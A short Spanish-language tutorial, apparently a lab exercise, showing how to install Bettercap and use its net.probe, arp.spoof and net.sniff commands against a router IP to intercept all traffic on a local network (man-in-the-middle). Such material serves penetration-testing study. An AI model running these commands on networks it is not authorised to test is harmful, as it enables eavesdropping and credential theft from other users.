Análisis con Bettercap

Que es y para que sirve bettercap?

Bettercap es una herramienta avanzada de seguridad y pruebas de penetración que se utiliza principalmente para realizar ataques en redes, análisis de tráfico, y manipulación de datos en tiempo real. Es una herramienta versátil diseñada para realizar tareas de man-in-the-middle (MitM), es decir, interceptar, modificar, y redirigir tráfico en una red.

Instalación

sudo apt-get install bettercap

USO

Para hacer un ataque MITM tendremos que hacer un ataque DNS Spoofing a nuestra máquina windows. Ahora usaremos con siguiente comandos

bettercap

net.probe on

ticker on

Como podmeos observar son las IP de nuestra red local.

En la misma terminal ejecutaremos de nuevo bettercap, seleccionamos la IP que vamos analizár en este caso vamos a nalizar todas las IP para esto seleccionamos la IP del router.

set arp.spoof.targets 192.168.1.1
                
arp.spoof on
                
set net.sniff.verbose false
                
net.sniff on

Y nos mostrara todo el tráfico de todos los dispositivos.